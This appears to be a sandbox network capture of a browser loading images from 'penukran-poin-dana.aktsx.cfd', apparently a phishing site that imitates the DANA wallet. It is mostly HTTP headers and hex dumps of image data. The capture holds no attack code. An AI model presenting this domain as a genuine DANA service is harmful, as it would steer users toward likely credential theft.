                                                                                                                            1192.168.2.649717165.22.241.119806220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 6, 2024 13:50:05.724560976 CEST412OUTGET /asset/img/dana_logo.png HTTP/1.1
                                                                                                                            Host: penukran-poin-dana.aktsx.cfd
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Oct 6, 2024 13:50:06.045213938 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:05 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Sun, 21 Apr 2024 03:10:27 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 12786
                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: image/png
                                                                                                                            Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 7e 00 00 00 70 08 06 00 00 01 6e a0 2b ae 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 31 a9 49 44 41 54 78 01 ed 7d 07 98 15 35 f7 fe b2 bb b0 2c 20 bd f7 ce d2 55 ba 4a 11 41 fe a0 58 10 44 f4 93 ce 27 a0 a8 88 20 cd f2 47 11 01 0b f8 09 08 82 52 a4 88 22 45 a4 23 8a 52 94 8e d2 41 a9 d2 9b ac c0 52 96 df 7b 2e e4 92 9d 9b 99 49 e6 ce 6d bb b9 cf b3 3b 33 c9 c9 c9 c9 9b 4c 26 39 39 39 89 8a 32 f9 8d 18 31 a2 dc b9 73 e7 fe 31 89 0e 9b e0 74 46 49 6e e0 67 0c 63 cf e9 f0 63 f7 e1 72 8d 66 82 f4 ed db b7 a4 95 f0 44 67 17 cf 78 05 f3 ea 45 54 45 b8 70 aa 09 4f 0d a8 08 4f e8 fe f1 c7 1f 0b 78 94 29 3d ff e3 e3 d8 fd 8e 1d 3b 96 da d1 d8 c5 9f 3c 79 72 bf 90 86 05 22 b3 f4 ec 9e ae 2c 73 76 35 8b a3 f0 65 cb 96 d5 5d b1 62 45 67 46 c3 d2 d0 b5 73 e7 ce 85 59 f8 cf 3f ff fc 36 bb e7 69 58 d8 8f 3f fe 78 3f bb e7 e3 e7 ce 9d db 82 c2 ff fd f7 df eb 1b 37 6e 1c 9d 82 26 c5 03 9f ca 70 cf e8 e8 ca 47 89 9e 57 ad 5a 35 99 d1 b0 74 ec b9 7b [TRUNCATED]
                                                                                                                            Data Ascii: PNGIHDR~pn+gAMAa1IDATx}5, UJAXD' GR"E#RAR{.Im;3L&99921s1tFIngccrfDgxETEpOOx)=;<yr",sv5e]bEgFsY?6iX?x?7n&pGWZ5t{EiX<])0#%K?~wc$Kd2:OB.Rt\':z,G7 KqetbE_},1gtOO^%6.hU>-|FEXl c<M6:]cbbnz|3gN0.\Hs#~M<o3f,.Ew[*[!%H+=z*>eg_o[c44))o>mGLONN.&(:::jq=Ii{aq,]>@Wa<e)ox<8hY<]Y8F={U+WhXz{+Tth/]d::q1#/3Y/{5j=4,2/:<1'3g3:/,Jm|v_4vW02xXOpk,gfz=/Mg"^U<HP1]ntO4|=<%c|fpy>dB_2({YjC+AUILLGT(cYb2U}>~1k
                                                                                                                            Oct 6, 2024 13:50:06.045253038 CEST1236INData Raw: 1d ca 23 e0 33 b2 27 a0 79 02 7f ef f1 f6 24 de 81 9f bf 7c 52 6b 7a ef 8c 9e a9 7d dd 2e 68 16 fc ec 2a f5 d4 a9 53 3b 8c 7f 78 83 7e 1a 39 72 64 35 a7 f2 2c 5e bc b8 f5 e9 d3 a7 ff 38 72 e4 c8 d2 84 84 84 5c 4e f8 90 f2 f5 16 8f 85 48 9f d5 09
                                                                                                                            Data Ascii: #3'y$|Rkz}.h*S;x~9rd5,^8r\NHhl80}&A[n=[ODKa"ZQYz9Q:>Yy^t/Jxz!)2m%iP6g<>pv_,4k=U+e{*
                                                                                                                            Oct 6, 2024 13:50:06.045278072 CEST1236INData Raw: 0b 85 6d db b6 ad 42 a3 ba 6e e4 47 fb 8c 82 f9 c3 9b 44 6b e2 96 99 06 15 7c 08 23 7c 5d dd 04 25 77 ee dc a5 dc e4 e7 94 17 86 a5 09 76 69 a3 b7 6f df 6e 3a fb b4 4b cc c5 c7 55 ad 5a d5 d1 5c 81 e3 21 bc a5 3e 92 45 ec de bd 7b 2d bb 4f 0d d7
                                                                                                                            Data Ascii: mBnGDk|#|]%wvion:KUZ\!>E{-O+>PPI7K)=ma=z^Lal_\:(P1M614Ps!$_?\E8G;V|PL*qfN&R|p4iB3!f>`
                                                                                                                            Oct 6, 2024 13:50:06.045291901 CEST1236INData Raw: f3 a0 14 1b b5 19 0f 8c 40 3a 50 42 e9 06 45 09 2d 73 0a 7c 64 40 64 f5 b7 f1 53 b1 61 2a 5f 8f 01 cb 5f e1 fb c2 7b 0a 93 1d 3c 50 36 ac e1 d3 b2 fb 27 9e 78 22 c1 2e 2d 1f cf d2 f1 57 1a 72 f2 34 56 f7 18 5b 1f e0 d3 b2 7b f8 6b cd 65 95 ce 10
                                                                                                                            Data Ascii: @:PBE-s|d@dSa*__{<P6'x".-Wr4V[{keq)hx<}*;bh|4IJh<x%:F:|!666R%!fXzvfBtp\r"^Hlrb#7mn0N<
                                                                                                                            Oct 6, 2024 13:50:06.045306921 CEST896INData Raw: 6a 92 22 83 68 b8 33 df 8e b4 b6 5f 3b d0 5c c1 41 09 3b 71 68 c3 82 46 8d 1a cd 46 3e 42 27 a8 8a f9 4b 93 f7 eb d7 2f a1 59 b3 66 ed ca 95 2b d7 00 1e 1a b2 23 e1 25 68 e3 36 c0 4f d0 94 67 9e 79 66 a5 34 23 3f 09 47 8c 18 51 a5 56 ad 5a ed cb
                                                                                                                            Data Ascii: j"h3_;\A;qhFF>B'K/Yf+#%h6Ogyf4#?GQVZ)s/!`5Ckd/|*Td(<4~8?b4#"Er%TNDyaptekvs%(RVd;wRc@ha:s%z3W9n
                                                                                                                            Oct 6, 2024 13:50:06.045321941 CEST1236INData Raw: 55 2d 73 9b 36 6d f2 b1 f4 c6 2b 9d 98 d9 b3 67 cf d2 26 3c d3 03 73 d3 b3 6a 71 fe c2 8b 26 e9 84 c1 f0 bc 91 60 cc 9f 3d d3 99 04 50 67 e6 11 26 8c 8a ca 04 dc 12 19 ad f1 8a 53 2b 1b 99 a4 13 06 63 de d3 c4 c8 83 3d a3 53 4d a4 af a4 28 61 8f
                                                                                                                            Data Ascii: U-s6m+g&<sjq&`=Pg&S+c=SM(a=xt*U2bY@A(3<O?:v>O,in3DgtFeQzI'gG"9 a^^{H/4u>xiS*{~QfCZ$(O
                                                                                                                            Oct 6, 2024 13:50:06.045336962 CEST1236INData Raw: 46 2e 58 2f dc 68 d8 b0 e1 b8 3c 79 f2 08 4d 5d 3c 8d 1f 67 61 bd be 7c f9 72 db c6 8f 0a 6d 89 c9 5d ef e6 cd 9b ab 34 ae 98 49 93 26 fd a7 69 d3 a6 83 21 84 54 e3 15 15 0c da 94 47 45 e1 a2 b0 96 2d 5b 4e 14 85 ab 84 a1 a1 47 e3 05 75 b4 fb a8
                                                                                                                            Data Ascii: F.X/h<yM]<ga|rm]4I&i!TGE-[NGuc=3/Pg!:SpB'wJ0H4#b{CfD|8&wP!74hi*/}yaKD>=W{A#U;^NaVci:IOOYxGdIT_?'li\L
                                                                                                                            Oct 6, 2024 13:50:06.045351028 CEST1236INData Raw: ba 75 63 ab 55 ab a6 74 be 52 5a 69 47 ba 9c 1a 01 8d 40 04 20 d0 a7 4f 9f c2 e8 f0 d7 84 5b 07 1b ee f2 90 a9 28 bc 20 93 e7 62 eb 43 bd 22 a0 0d 68 11 35 02 1a 81 b4 83 40 3c 0e 6e 9c 16 ee 1d 6c b8 cb 87 5d 9c 57 71 64 d9 2b 69 a7 d9 e8 92 6a
                                                                                                                            Data Ascii: ucUtRZiG@ O[( bC"h5@<nl]Wqd+ij41);Hd<x^7BH@/~5d%4.F@#I|u&"&^$+L@7o>$-F@#Y:i=K7!-ox*RfqRb^u
                                                                                                                            Oct 6, 2024 13:50:06.045367956 CEST1236INData Raw: 48 0b 49 d3 a7 4f bf 07 f9 04 6a 34 cc 8a a0 7a cd 04 cb 8e 15 6e 94 95 f1 c0 88 73 1f ce 04 2e a2 2a 88 04 bd 52 c7 8f 91 de 3f 3d 7a f4 b0 1d 49 18 f2 8d c7 b1 9a b5 51 5f 23 a1 c3 3f c6 ca e4 e4 8a 85 e8 f1 e0 ad a4 96 33 c8 22 fd 08 97 1a fd
                                                                                                                            Data Ascii: HIOj4zns.*R?=zIQ_#?3"#eB/daY`pNxs]i6'uFi~7c-Csn-s=%#VQxAB~Y5wEF(;'JwLchYxt4eh+
                                                                                                                            Oct 6, 2024 13:50:06.045384884 CEST1236INData Raw: bd 14 80 91 fe 7a 59 72 d5 91 41 41 00 a3 ba 8c 98 6a 4a 37 bc a0 08 e5 62 26 98 ca 6f 87 b9 6e a2 2c 4b cc 58 69 07 6b 6a 9c 01 c9 42 a0 e9 34 02 4a 08 44 63 9a 40 56 03 4a 89 34 71 c8 11 48 c6 c8 2e d5 56 1a 46 54 f1 f8 b8 49 8f d2 60 e6 4a 23
                                                                                                                            Data Ascii: zYrAAjJ7b&on,KXikjB4JDc@VJ4qH.VFTI`J#TG[ !;l<ER]Ri3<@NC\BBB+UYQ*jX/Kv,QgLrU"aS4 !^agf bap'X4$bj,} 3-
                                                                                                                            Oct 6, 2024 13:50:06.050370932 CEST1010INData Raw: b3 46 20 f5 21 60 ec f8 a3 b0 60 99 d8 bb 77 ef 56 38 05 e8 47 78 3e 74 d5 9d 29 0f 1f 3a f2 58 2c ec 95 a4 3f 84 3f c8 c7 e9 fb db 08 60 63 d0 cc fa f5 eb f7 b9 1d 92 ba ef 60 97 bf 07 47 2b 0e 69 df be fd 54 94 54 db 18 a7 ee ea d6 a5 0b 11 02
                                                                                                                            Data Ascii: F !``wV8Gx>t):X,??`c`G+iTT>?]7ja%H4-o]pZ$w^$=_`#`kjFTdC=q8Yr**sDAz02Tn[{^YBg:osCkE


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.649722165.22.241.119806220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 6, 2024 13:50:05.726408958 CEST407OUTGET /asset/img/hero.svg HTTP/1.1
                                                                                                                            Host: penukran-poin-dana.aktsx.cfd
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Oct 6, 2024 13:50:06.621870995 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Sun, 21 Apr 2024 03:10:27 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 31697
                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: image/svg+xml
                                                                                                                            Data Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 36 30 30 22 20 68 65 69 67 68 74 3d 22 35 32 37 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 3c 64 65 66 73 3e 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 78 31 3d 22 35 30 25 22 20 79 31 3d 22 30 25 22 20 78 32 3d 22 35 30 25 22 20 79 32 3d 22 31 30 30 25 22 20 69 64 3d 22 64 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 44 32 46 31 46 46 22 20 6f 66 66 73 65 74 3d 22 30 25 22 2f 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 41 36 44 45 46 46 22 20 6f 66 66 73 65 74 3d 22 31 30 30 25 22 2f 3e 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 78 31 3d 22 35 30 25 22 20 79 31 3d 22 30 25 22 20 78 32 3d 22 35 30 25 22 20 79 32 3d 22 31 30 30 25 22 20 69 64 3d 22 65 22 3e 3c 73 74 6f 70 20 73 [TRUNCATED]
                                                                                                                            Data Ascii: <svg width="600" height="527" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><defs><linearGradient x1="50%" y1="0%" x2="50%" y2="100%" id="d"><stop stop-color="#D2F1FF" offset="0%"/><stop stop-color="#A6DEFF" offset="100%"/></linearGradient><linearGradient x1="50%" y1="0%" x2="50%" y2="100%" id="e"><stop stop-color="#F9FDFF" offset="0%"/><stop stop-color="#D9EFFF" offset="100%"/></linearGradient><linearGradient x1="32.791%" y1="0%" x2="50%" y2="100%" id="g"><stop stop-color="#BDCCFF" offset="0%"/><stop stop-color="#108EE9" offset="100%"/></linearGradient><linearGradient x1="8.191%" y1="47.527%" x2="102.093%" y2="27.162%" id="i"><stop stop-color="red" offset="0%"/><stop stop-color="#B91E1E" offset="17.311%"/><stop stop-color="red" offset="56.406%"/><stop stop-color="#B02222" offset="69.081%"/><stop stop-color="red" offset="100%"/></linearGradient><linearGradient x1="4.347%" y1="58.377%" x2="94.209%" y2="32.155%" id="j"><stop stop-color="#FFF" o
                                                                                                                            Oct 6, 2024 13:50:06.621943951 CEST1236INData Raw: 66 66 73 65 74 3d 22 30 25 22 2f 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 46 44 39 44 39 22 20 6f 66 66 73 65 74 3d 22 32 31 2e 32 37 31 25 22 2f 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 46 46 43 46 43
                                                                                                                            Data Ascii: ffset="0%"/><stop stop-color="#FFD9D9" offset="21.271%"/><stop stop-color="#FFFCFC" offset="68.089%"/><stop stop-color="#FFE6E6" offset="79.25%"/><stop stop-color="#FFF" offset="100%"/></linearGradient><linearGradient x1="84.572%" y1="43.528%"
                                                                                                                            Oct 6, 2024 13:50:06.621978045 CEST448INData Raw: 30 25 22 20 79 32 3d 22 31 30 30 25 22 20 69 64 3d 22 71 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 39 46 44 46 46 22 20 6f 66 66 73 65 74 3d 22 30 25 22 2f 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 44 39
                                                                                                                            Data Ascii: 0%" y2="100%" id="q"><stop stop-color="#F9FDFF" offset="0%"/><stop stop-color="#D9EFFF" offset="100%"/></linearGradient><linearGradient x1="66.905%" y1="80.958%" x2="38.457%" y2="55.304%" id="r"><stop stop-color="#1C2A65" offset="0%"/><stop st
                                                                                                                            Oct 6, 2024 13:50:06.622039080 CEST1236INData Raw: 65 6e 74 3e 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 78 31 3d 22 38 32 2e 30 37 38 25 22 20 79 31 3d 22 38 30 2e 39 35 38 25 22 20 78 32 3d 22 32 38 2e 30 39 36 25 22 20 79 32 3d 22 35 35 2e 33 30 34 25 22 20 69 64 3d 22 74 22 3e 3c 73 74
                                                                                                                            Data Ascii: ent><linearGradient x1="82.078%" y1="80.958%" x2="28.096%" y2="55.304%" id="t"><stop stop-color="#1C2A65" offset="0%"/><stop stop-color="#07538A" offset="100%"/></linearGradient><linearGradient x1="19.094%" y1="5.889%" x2="85.051%" y2="82.718%
                                                                                                                            Oct 6, 2024 13:50:06.622077942 CEST1236INData Raw: 2d 34 39 25 22 20 79 3d 22 2d 34 30 2e 33 25 22 20 77 69 64 74 68 3d 22 31 39 38 25 22 20 68 65 69 67 68 74 3d 22 31 38 30 2e 36 25 22 20 66 69 6c 74 65 72 55 6e 69 74 73 3d 22 6f 62 6a 65 63 74 42 6f 75 6e 64 69 6e 67 42 6f 78 22 20 69 64 3d 22
                                                                                                                            Data Ascii: -49%" y="-40.3%" width="198%" height="180.6%" filterUnits="objectBoundingBox" id="y"><feOffset dy="2" in="SourceAlpha" result="shadowOffsetOuter1"/><feGaussianBlur stdDeviation="12" in="shadowOffsetOuter1" result="shadowBlurOuter1"/><feColorMa
                                                                                                                            Oct 6, 2024 13:50:06.622092009 CEST1236INData Raw: 34 2e 36 35 35 20 35 32 34 2e 37 33 36 20 31 37 68 37 30 2e 39 30 34 7a 4d 37 30 37 20 31 37 6c 2d 2e 35 38 34 20 39 34 2e 38 30 32 4c 33 34 37 2e 39 36 20 33 35 34 2e 36 35 35 20 37 30 37 20 31 37 7a 6d 2d 37 32 30 20 30 6c 33 35 39 2e 30 34 20
                                                                                                                            Data Ascii: 4.655 524.736 17h70.904zM707 17l-.584 94.802L347.96 354.655 707 17zm-720 0l359.04 337.655-358.456-242.853L-13 17z" fill="url(#b)" opacity=".5" mask="url(#c)"/><g mask="url(#c)"><path d="M249.238 0h220c11.046 0 20 8.954 20 20v375h-260V20c0-11.0
                                                                                                                            Oct 6, 2024 13:50:06.622103930 CEST1236INData Raw: 39 2d 31 39 2e 35 38 2d 32 30 2e 34 31 32 2e 32 32 38 2d 31 30 2e 39 32 39 20 39 2e 31 38 2d 31 39 2e 36 32 37 20 32 30 2e 30 36 38 2d 31 39 2e 35 38 34 6c 2e 33 34 35 2e 30 30 34 63 33 32 2e 35 37 36 2e 36 37 39 20 36 35 2e 35 38 34 2d 31 33 2e
                                                                                                                            Data Ascii: 9-19.58-20.412.228-10.929 9.18-19.627 20.068-19.584l.345.004c32.576.679 65.584-13.137 99.443-42.407z" fill="url(#k)" mask="url(#h)" transform="rotate(40 180.528 214.438)"/></g><path d="M159.717 317.267l42.327-7.463c11.248-1.983 22.299 4.386 26
                                                                                                                            Oct 6, 2024 13:50:06.622138977 CEST896INData Raw: 37 37 35 2d 2e 38 35 2d 31 2e 37 39 39 2d 2e 38 37 33 61 34 35 32 2e 30 31 20 34 35 32 2e 30 31 20 30 20 30 31 2d 2e 39 30 38 2d 2e 34 34 34 6c 2d 31 2e 38 33 34 2d 2e 39 30 35 2d 2e 39 32 36 2d 2e 34 36 2d 32 2e 38 31 33 2d 31 2e 34 31 34 63 2d
                                                                                                                            Data Ascii: 775-.85-1.799-.873a452.01 452.01 0 01-.908-.444l-1.834-.905-.926-.46-2.813-1.414c-.316-.16-.633-.32-.95-.482l-1.918-.98c-7.86-4.038-10.958-13.683-6.92-21.543 4.038-7.86 13.683-10.959 21.543-6.92l1.68.859 1.658.84 1.635.82 1.611.801 1.589.782 1
                                                                                                                            Oct 6, 2024 13:50:06.622173071 CEST1236INData Raw: 66 69 6c 6c 3d 22 75 72 6c 28 23 6c 29 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 6e 6f 6e 7a 65 72 6f 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 72 6f 74 61 74 65 28 2d 31 30 20 31 39 35 36 2e 37 32 38 20 33 2e 38 38 33 29 22 2f 3e 3c 70 61 74 68 20 64
                                                                                                                            Data Ascii: fill="url(#l)" fill-rule="nonzero" transform="rotate(-10 1956.728 3.883)"/><path d="M140.136 97.06h27.906c18.65 0 34.09 14.49 35.27 33.101l6.528 102.806c.412 6.493-4.517 12.091-11.01 12.503a11.78 11.78 0 01-.747.024h-87.988c-6.507 0-11.781-5.2
                                                                                                                            Oct 6, 2024 13:50:06.622208118 CEST1236INData Raw: 33 37 34 2d 33 2e 39 33 32 20 35 2e 39 33 34 6c 2e 30 34 34 2e 30 30 33 2d 33 2e 37 38 34 2e 36 36 37 2d 31 2e 37 39 35 2d 31 30 2e 31 38 32 20 33 2e 35 34 34 2d 2e 36 32 35 2e 30 31 39 2d 2e 30 30 34 2e 30 31 39 2d 2e 30 30 34 63 2e 30 31 33 2d
                                                                                                                            Data Ascii: 374-3.932 5.934l.044.003-3.784.667-1.795-10.182 3.544-.625.019-.004.019-.004c.013-.003.026-.003.039-.005zm12.953-2.286c2.335-.412 4.564 1.16 5.034 3.52l.005-.002 1.042 5.907-2.142.378-.385-2.184-4.286.756.385 2.184-2.142.377-1.042-5.906.005-.0
                                                                                                                            Oct 6, 2024 13:50:06.627217054 CEST1236INData Raw: 61 74 65 28 2d 31 30 20 32 30 35 33 2e 39 38 34 20 2d 36 32 30 2e 36 32 32 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 38 34 2e 34 37 36 20 33 37 2e 33 33 39 63 2d 35 2e 32 38 31 20 30 2d 35 2e 32 38 31 2d 31 39 2e 31 32 37 20 30 2d 31 39 2e 31 32 37
                                                                                                                            Data Ascii: ate(-10 2053.984 -620.622)"><path d="M84.476 37.339c-5.281 0-5.281-19.127 0-19.127a9.563 9.563 0 010 19.127zM9.748 37.339c5.281 0 5.281-19.127 0-19.127a9.563 9.563 0 000 19.127z" fill="#FFC0B3"/><path d="M21.179.74h51.834c6.506 0 11.78 5.274 1


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.2.649721165.22.241.119806220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 6, 2024 13:50:05.726469040 CEST412OUTGET /asset/img/dana_text.png HTTP/1.1
                                                                                                                            Host: penukran-poin-dana.aktsx.cfd
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Oct 6, 2024 13:50:06.910634995 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Sun, 21 Apr 2024 03:10:27 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 10588
                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: image/png
                                                                                                                            Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 e0 00 00 00 76 08 06 00 00 00 10 9c 40 7f 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 20 00 49 44 41 54 78 9c ed 9d 7b 78 9c 57 7d e7 bf bf f3 ce 68 a4 91 c6 92 6d c9 b2 62 3b 11 89 21 89 53 6e b1 21 40 d2 20 3f dd 66 cb bd 85 75 d2 3e dd 96 6b 6f cb 25 d0 74 81 c0 52 14 1a 68 a1 85 2e 6d b9 b4 0b 5d 5a 1a 58 64 9a 2e 94 72 ed 62 71 29 2d d4 22 0d c5 4e 1a 2b 8e 82 65 c9 b2 64 59 b7 91 e6 f2 be e7 bb 7f 9c 77 ec b1 e2 8b 64 cd 79 e7 7d 35 e7 f3 3c 7a 6c 49 af e6 9c f7 bc e7 3d bf f3 bb 1e c0 e1 70 38 1c 0e 87 c3 e1 70 38 1c 0e 87 c3 e1 70 38 1c 0e 87 c3 e1 70 38 1c eb 8a 81 81 01 6f 72 72 32 47 72 c3 a9 53 a7 36 90 bc d8 57 fb 2a 7e 77 b1 6b 57 d4 ce e4 e4 64 6e 6c 6c 2c 4b b2 89 64 9a 64 8a a4 47 52 f5 f7 f7 2b 92 52 ef f1 73 d4 1e 92 12 7e a9 f0 79 a7 49 66 c6 c6 c6 b2 27 4f 9e 6c 23 99 0b bf da 4e 9c 38 d1 1a ce 91 0c c9 f4 81 03 07 52 e1 df 89 9b 1f c9 a5 ea f9 57 cf 81 66 92 59 92 ad e1 f3 [TRUNCATED]
                                                                                                                            Data Ascii: PNGIHDRv@sRGBsBIT|d IDATx{xW}hmb;!Sn!@ ?fu>ko%tRh.m]ZXd.rbq)-"N+edYwdy}5<zlI=p8p8p8p8orr2GrS6W*~wkWdnll,KddGR+Rs~yIf'Ol#N8RWfY099#Gd<;@2^8qD+*y@,,P/fT;*7 r}0s"U?;_T?oU@Yy)8>?44TgOFco}Zlj[lL2+"-R$"RZ/WJ=yG;JUsCHz|[kkfv+`@fL<EY1~3ni.5`[)**@ O "0R(8`@AD:fwgVqVdYDNA|*lFHl.{vyM3+sD(pLkeN>=q%X['x}}}BPu)@qGE~p@1&pkD}d0sE$s>k3"rX8vXs} AT*LKv1 y<NrZiA|zFBdw|89@R<E({K
                                                                                                                            Oct 6, 2024 13:50:06.910675049 CEST1236INData Raw: 1e 92 1d 24 57 ba b9 73 d4 10 1a f3 f0 06 92 d7 07 41 70 17 c9 61 ad f5 54 f8 9c 6c e1 93 3c 41 f2 41 df f7 5f 57 28 14 9e 4c b2 b5 bf bf bf 3e 73 80 64 8b d6 fa 87 16 6f b8 5e 68 92 d3 24 bf eb fb fe 8b 48 76 87 7e 42 b7 e0 d6 09 1a 1f 4e 96 46
                                                                                                                            Data Ascii: $WsApaTl<AA_W(L>sdo^h$Hv~BNFQk}d.C_#d-@ xqZky7D2]v|OQSZO@X& ZefA\E8O|+M0p?M5@r8yLk=BR>}mZI
                                                                                                                            Oct 6, 2024 13:50:06.910691977 CEST1236INData Raw: a1 ff 1d 18 f3 7c 23 42 00 0f 14 8b c5 3b 32 99 cc 63 8d 14 17 10 2a 23 3d 00 3e 0d a0 af ce dd a9 27 01 80 fb 00 bc 55 44 26 56 fb c7 ce 07 bc 02 42 ad e7 26 00 9f dd bd 7b f7 d5 8d ec ff 23 d9 1c 04 c1 6d 4a a9 3f 42 83 0a 5f e0 cc 9c b8 1a c0
                                                                                                                            Data Ascii: |#B;2c*#=>'UD&VB&{#mJ?B_5?pm4MMM^ZZY?0)`_;ZHce>LH~Bs_9L.--b6_GsO5_x3>HvjAWS=iC<
                                                                                                                            Oct 6, 2024 13:50:06.910757065 CEST672INData Raw: b5 7e 87 52 ea 5d a8 9f 00 9e 27 f9 2d 11 f9 36 80 ef 01 18 01 30 07 33 37 18 7e c9 e8 e8 a8 6c df be bd 22 88 37 fa be 7f 8d 52 ea 16 a5 d4 2d 30 72 a2 5e 73 58 c3 9c a2 f6 e5 f3 96 2a 25 99 25 f9 c3 95 9c 46 7c 99 7c 8c e6 48 bf 9a 40 93 93 ea
                                                                                                                            Data Ascii: ~R]'-6037~l"7R-0r^sX*%%F||H@lBi$H-J$~?;H^Mi0"LT*=;QX"$NV~)+'''s4f$o$'q#Zq?*$9[q;II>9f.rT7;m$?NX
                                                                                                                            Oct 6, 2024 13:50:06.910773039 CEST1236INData Raw: be 50 21 b4 b6 6e d2 6c 2e da 49 fe 0e c9 85 08 6f 71 a9 5c 2e f7 3d e1 de 6c 6b c0 24 3f 19 b5 00 0e 07 da 23 b9 39 34 67 45 aa f5 68 ad 49 f2 7f 1e 39 72 24 51 66 27 00 20 f9 ec 08 87 aa 14 04 c1 9d 34 da 69 24 9b 95 43 87 0e 35 91 bc 4e 6b fd
                                                                                                                            Data Ascii: P!nl.Ioq\.=lk$?#94gEhI9r$Qf' 4i$C5Nksu]4_pl}vF4h4gEWHvEqkell,bcH\U399}H>)Ijnn^Ma -&/*&yL=LP(\C#WO$|?G4&>_%
                                                                                                                            Oct 6, 2024 13:50:06.910789013 CEST1236INData Raw: 9e 84 3b de 87 00 fc 75 04 6d dd 94 c9 64 ce 5f 8c 3b 06 0c 0e 0e 7a a9 54 6a 87 65 9f cc 61 00 93 16 3f 7f 4d 84 69 29 ff 0e bb 0b 43 6b 4b 4b 4b 77 1c dd 11 4d 4d 4d 69 00 56 0f 8e 10 91 03 a7 4f 9f 9e b0 d9 c6 5a 18 1c 1c cc fb be ff 69 58 9c
                                                                                                                            Data Ascii: ;umd_;zTjea?Mi)CkKKKwMMMiVOZiX"fctww5|@!nVy`#66%#yr;---Z?_\Z`01+$5/={?&c4~G|^R*:a27lQ@|)
